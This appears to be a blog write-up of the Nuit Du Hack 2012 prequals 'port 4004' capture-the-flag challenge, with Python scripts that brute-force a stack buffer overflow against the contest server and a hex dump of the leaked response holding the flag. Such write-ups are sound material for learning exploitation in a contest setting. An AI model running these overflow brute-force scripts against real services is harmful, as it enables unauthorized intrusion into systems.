Nuit Du Hack 2012 Prequals – Port 4004 Writeup

After solving the Port 4000 challenge, I connected to the sciteek.nuitduhack.com:4004 service,  which was mentioned in the flag file I was able to fetch.

The main idea is the same: looks like the service is vulnerable to a stack-based buffer overflow. By sending 100 + 1 bytes, I’m able to overwrite one byte of the return address. So I made another Python script in order to bruteforce:


import socket
import time

packet = """GET /AB HTTP/1.1
Host: sciteek.nuitduhack.com:4004
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0)%s"""

for i in range(135,138, 2):
    print "--> i: %s" % i
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('sciteek.nuitduhack.com', 4004))
    s.send(packet % chr(i))

    received = s.recv(4096)
    received2 = s.recv(4096)
    s.close()
    print "received %s bytes" % len(received)
    print received
    print "received %s bytes" % len(received2)
    print received2
    print '\n\n\n'
    time.sleep(3)

When trying with i = 0x87, the response from the server was “You are authenticated”, but there wasn’t anything else that could be interpreted as the flag for this challenge. Since that message looked like I was on my way, I decided to keep that 0x87 byte at the 101st position of my packet, then I started sending 100 bytes + 0x87 + 1 more bruteforcing byte:


packet = 'A' * 100 + '\x87'

for i in range(256):
    print "--> i: %s" % i
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('sciteek.nuitduhack.com', 4004))
    s.send(packet + chr(i))

I left that new script running, when I suddenly started hearing sounds from the speaker of my notebook when trying to print the server’s response! I took a look at the cmd window, and I saw I had received the following response with i = 0x81 (hex format copied from Wireshark to make it more readable, since there’s a lot of non-printable chars):


00000085  03 01 01 03 02 04 02 01  00 00 04 02 02 00 00 04 ........ ........
00000095  0a 01 00 17 01 01 0a 02  0a 00 11 f2 ff 0b 02 04 ........ ........
000000A5  00 00 02 03 02 03 01 1a  01 03 01 01 03 02 01 03 ........ ........
000000B5  03 01 03 04 0e 00 03 03  04 0a 04 01 17 04 04 10 ........ ........
000000C5  13 00 18 00 03 02 1e 0c  00 04 06 00 04 0a 00 0a ........ ........
000000D5  01 0a 03 16 e3 03 04 03  03 03 02 03 01 1a 01 03 ........ ........
000000E5  00 01 03 01 04 0a 01 00  17 01 01 10 1a 00 18 01 ........ ........
000000F5  01 61 1f 0f 00 18 01 01  7a 1e 08 00 07 01 01 20 .a...... z......
00000105  04 06 00 01 0a 00 16 dc  03 01 03 00 1a 01 03 00 ........ ........
00000115  01 03 01 04 0a 01 00 17  01 01 10 1a 00 18 01 01 ........ ........
00000125  41 1f 0f 00 18 01 01 5a  1e 08 00 06 01 01 20 04 A......Z ...... .
00000135  06 00 01 0a 00 16 dc 03  01 03 00 1a 01 03 03 01 ........ ........
00000145  03 04 01 03 05 0e 00 05  05 18 00 05 02 1e 23 00 ........ ......#.
00000155  04 0a 03 00 04 0a 04 01  18 00 03 04 10 06 00 04 ........ ........
00000165  01 00 01 16 12 17 03 03  10 08 00 0a 00 0a 01 0a ........ ........
00000175  05 16 d6 0e 00 00 00 03  05 03 04 03 03 1a 01 03 ........ ........
00000185  01 01 03 02 01 03 03 01  03 04 0e 00 02 02 04 00 ........ ........
00000195  03 00 19 04 e9 fe 1d 03  00 0b 03 04 0a 01 00 17 ........ ........
000001A5  01 01 10 43 00 18 01 01  30 1f 38 00 18 01 01 39 ...C.... 0.8....9
000001B5  1e 31 00 07 01 01 30 0e  00 04 04 04 01 04 01 01 .1....0. ........
000001C5  03 03 17 03 03 10 0c 00  08 01 04 0a 0b 03 17 03 ........ ........
000001D5  03 11 f4 ff 08 00 04 01  06 00 02 04 03 03 0b 03 ........ ........
000001E5  0a 00 16 b7 0e 00 02 02  04 00 00 02 03 04 03 03 ........ ........
000001F5  03 02 03 01 1a 01 03 00  01 03 01 04 00 01 00 19 ........ ........
00000205  04 7c fe 04 00 03 00 04  00 02 01 04 01 01 01 04 .|...... ........
00000215  01 00 04 30 03 01 03 00  1a 01 03 00 01 03 03 0e ...0.... ........
00000225  00 03 03 18 00 03 02 10  0d 00 1e 0a 00 04 06 00 ........ ........
00000235  01 0a 03 0a 00 16 ec 03  03 03 00 1a 04 00 01 00 ........ ........
00000245  04 01 00 05 30 1a 04 00  02 01 04 00 01 00 04 01 ....0... ........
00000255  00 02 30 1a 04 00 03 02  04 00 02 01 04 00 01 00 ..0..... ........
00000265  04 01 00 03 30 1a 01 03  03 04 00 03 02 04 00 02 ....0... ........
00000275  01 04 00 01 00 04 01 00  11 30 03 03 1a 01 03 01 ........ .0......
00000285  01 03 02 01 03 03 01 03  04 01 03 05 04 02 01 00 ........ ........
00000295  00 19 04 b1 ff 18 02 00  ff ff 11 0f 00 0e 00 00 ........ ........
000002A5  00 03 05 03 04 03 03 03  02 03 01 1a 04 00 03 00 ........ ........
000002B5  04 02 01 00 00 04 02 02  02 00 19 04 a8 ff 04 00 ........ ........
000002C5  04 00 0a 04 04 00 00 03  04 02 01 00 00 04 02 02 ........ ........
000002D5  00 00 19 04 90 ff 07 00  08 04 04 00 05 08 04 00 ........ ........
000002E5  00 03 04 00 01 08 04 00  02 04 19 04 66 ff 06 00 ........ ....f...
000002F5  04 05 0b 04 04 07 04 00  04 00 00 05 19 04 f5 fe ........ ........
00000305  04 01 00 01 0a 04 07 00  04 05 06 00 08 04 03 05 ........ ........
00000315  03 04 03 03 03 02 03 01  1a 04 02 00 08 83 19 04 ........ ........
00000325  d3 fe 07 01 08 64 04 00  05 08 04 02 00 00 00 04 .....d.. ........
00000335  00 01 05 04 01 02 66 19  04 19 ff 04 02 00 11 11 ......f. ........
00000345  04 00 01 05 04 02 02 64  00 19 04 5b fd 06 01 08 .......d ...[....
00000355  64 1a 04 02 00 11 11 04  02 01 64 83 04 02 02 00 d....... ..d.....
00000365  01 19 04 d7 fd 11 05 00  10 9a 00 16 09 04 02 00 ........ ........
00000375  3a 83 19 04 7f fe 1a 0e  00 07 07 19 04 9a ff 19 :....... ........
00000385  04 cf ff 1c 50 61 73 73  77 6f 72 64 20 28 72 65 ....Pass word (re
00000395  71 75 69 72 65 64 29 3a  20 00 73 63 69 74 65 65 quired):  .scitee
000003A5  6b 2e 6e 75 69 74 64 75  68 61 63 6b 2e 63 6f 6d k.nuitdu hack.com
000003B5  3a 34 30 30 34 00 42 61  64 20 70 61 73 73 77 6f :4004.Ba d passwo
000003C5  72 64 2e 0a 00 59 6f 75  20 61 72 65 20 6e 6f 77 rd...You  are now
000003D5  20 61 75 74 68 65 6e 74  69 63 61 74 65 64 0a 00  authent icated..
000003E5  5a 6f 6d 66 67 53 63 69  50 61 64 57 69 6c 6c 52 ZomfgSci PadWillR
000003F5  30 78 78 44 34 46 75 63  6b 31 6e 77 30 52 4c 64 0xxD4Fuc k1nw0RLd
00000405  21 21 21 0a 00 04 02 00  49 83 19 04 e7 fd 1c 00 !!!..... I.......

So ZomfgSciPadWillR0xxD4Fuck1nw0RLd!!! should be the flag for this challenge. Unfortunately looks like I have resolved this challenge too early, before receiving the instructions for it, so I didn’t know which subject to use in order to send the flag to Piotr. I guess I needed to solve some previous challenge before entering this one.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s